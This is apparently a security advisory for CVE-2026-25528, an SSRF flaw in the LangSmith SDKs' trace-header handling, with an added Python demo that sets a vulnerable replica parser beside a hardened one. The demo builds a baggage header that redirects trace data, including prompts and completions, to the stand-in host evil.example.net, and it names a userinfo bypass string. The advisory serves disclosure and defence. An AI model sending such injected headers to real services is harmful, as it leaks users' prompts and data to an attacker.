PT-2026-7149 · LangSmith · LangSmith Client SDKs
Angus-Langchain · Published 2026-02-09 · Updated 2026-05-20 · CVE-2026-25528
CVSS v3.1: 5.8 (Medium)
Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Name of the Vulnerable Software and Affected Versions
LangSmith Python SDK (langsmith) versions prior to 0.6.3
LangSmith JavaScript/TypeScript SDK (langsmith) versions prior to 0.4.6

Description
The LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery (SSRF) through manipulation of HTTP headers. The SDK reconstructs tracing context from inbound request headers using RunTree.from_headers() in Python and RunTree.fromHeaders() in TypeScript, and it accepts attacker-controlled api_url and api_key values carried in the baggage header without validation. When a traced operation completes, the SDK's post() and patch() methods send the run data to every configured replica URL, including those injected through the header. Any unauthenticated request to a service that passes untrusted headers into from_headers()/fromHeaders() therefore makes that service transmit its trace data, including prompts, completions and run metadata, to an endpoint the attacker controls. The outbound request is issued by the traced service rather than by the attacker, which is why the vector carries a scope change (S:C); no privileges or user interaction are required (PR:N/UI:N), and the impact is limited to confidentiality (C:L).

Recommendations
Update the Python SDK (langsmith) to version 0.6.3 or later. Update the JavaScript/TypeScript SDK (langsmith) to version 0.4.6 or later. Until the upgrade is deployed, do not feed headers from untrusted clients into RunTree.from_headers()/fromHeaders(), or strip the baggage header from such requests at the edge before they reach the traced service.
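The following added example (not LangSmith's own code) models the header-parsing flaw described above with a small stand-in for the SDK: a vulnerable replica builder that trusts api_url/api_key from the baggage header, next to a hardened variant that only lets the header select among operator-configured https hosts and never takes credentials from the request. The baggage key name langsmith-replicas, its JSON encoding, the allowlist strategy and all header values are assumptions made for illustration; the page does not describe the actual fix shipped in 0.6.3/0.4.6.

```python
"""Stand-in for LangSmith RunTree.from_headers() replica handling (CVE-2026-25528 pattern).
Added example, not LangSmith code. The 'langsmith-replicas' baggage key, its JSON
encoding and the allowlist approach are assumptions for illustration."""
import json
from urllib.parse import quote, unquote, urlparse

# Server-side configuration (constructed values, not real endpoints or keys).
SERVER_API_URL = "https://api.smith.langchain.com"
SERVER_API_KEY = "lsv2_pt_server_key"
ALLOWED_REPLICA_HOSTS = {"api.smith.langchain.com", "eu.api.smith.langchain.com"}


def _baggage(members: dict) -> str:
    """Build a W3C baggage header; values are percent-encoded (commas included)."""
    return ",".join(f"{k}={quote(v, safe='')}" for k, v in members.items())


# Constructed inbound headers. The attacker smuggles a replica whose api_url is a
# host they control and supplies their own api_key so the upload is accepted there.
ATTACKER_HEADERS = {
    "baggage": _baggage({
        "langsmith-project": "prod-chatbot",
        "langsmith-replicas": json.dumps(
            [{"api_url": "https://evil.example.net/api", "api_key": "lsv2_attacker"}]),
    })
}
# A legitimate caller only names a region the operator already trusts.
LEGIT_HEADERS = {
    "baggage": _baggage({
        "langsmith-project": "prod-chatbot",
        "langsmith-replicas": json.dumps([{"api_url": "https://eu.api.smith.langchain.com"}]),
    })
}


def parse_baggage(header: str) -> dict:
    """Split a baggage header into {key: decoded value}; member properties
    (';k=v') are dropped and members without '=' are ignored."""
    members = {}
    for member in header.split(","):
        member = member.strip()
        if "=" not in member:
            continue
        key, _, rest = member.partition("=")
        members[key.strip()] = unquote(rest.split(";", 1)[0].strip())
    return members


def _replica_list(bag: dict) -> list:
    """Decode the replica list; anything that is not a JSON list of objects yields []."""
    try:
        replicas = json.loads(bag.get("langsmith-replicas", "[]"))
    except json.JSONDecodeError:
        return []
    if not isinstance(replicas, list):
        return []
    return [r for r in replicas if isinstance(r, dict)]


def replicas_unchecked(headers: dict, api_url: str, api_key: str) -> list:
    """Pre-fix pattern: every api_url/api_key pair in the header becomes an upload target."""
    targets = [(api_url, api_key)]
    for r in _replica_list(parse_baggage(headers.get("baggage", ""))):
        if "api_url" in r:
            targets.append((r["api_url"], r.get("api_key", api_key)))
    return targets


def replicas_checked(headers: dict, api_url: str, api_key: str, allowed_hosts: set) -> list:
    """Hardened pattern: the header may only pick operator-configured hosts, over https
    on the default port, and can never supply credentials."""
    targets = [(api_url, api_key)]
    for r in _replica_list(parse_baggage(headers.get("baggage", ""))):
        url = r.get("api_url", "")
        if not isinstance(url, str):
            continue
        parsed = urlparse(url)
        if parsed.scheme != "https" or parsed.hostname not in allowed_hosts \
                or parsed.port not in (None, 443):
            continue  # would be an SSRF / exfiltration target: drop it
        targets.append((url.rstrip("/"), api_key))  # server's own key, never the header's
    return targets


def post_run(run: dict, targets: list) -> list:
    """Stand-in for RunTree.post(): returns the endpoints the run body would be sent to."""
    return [f"{url}/runs" for url, _ in targets]


if __name__ == "__main__":
    run = {"inputs": {"prompt": "user secret"}, "outputs": {"completion": "model answer"}}
    print("vulnerable:", post_run(run, replicas_unchecked(ATTACKER_HEADERS, SERVER_API_URL, SERVER_API_KEY)))
    print("hardened:  ", post_run(run, replicas_checked(ATTACKER_HEADERS, SERVER_API_URL, SERVER_API_KEY, ALLOWED_REPLICA_HOSTS)))
```

Running the block shows the vulnerable path posting the run to https://evil.example.net/api/runs while the hardened path only reaches the server's configured endpoint; the urlparse-based check uses hostname (so userinfo tricks like https://api.smith.langchain.com@evil.example.net/ do not pass) and rejects non-default ports.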

Exploit · Fix · SSRF

Weakness Enumeration

Related Identifiers

CVE-2026-25528
GHSA-v34v-rq6j-cj6p

Affected Products

LangSmith Client SDKs (Python and JavaScript/TypeScript)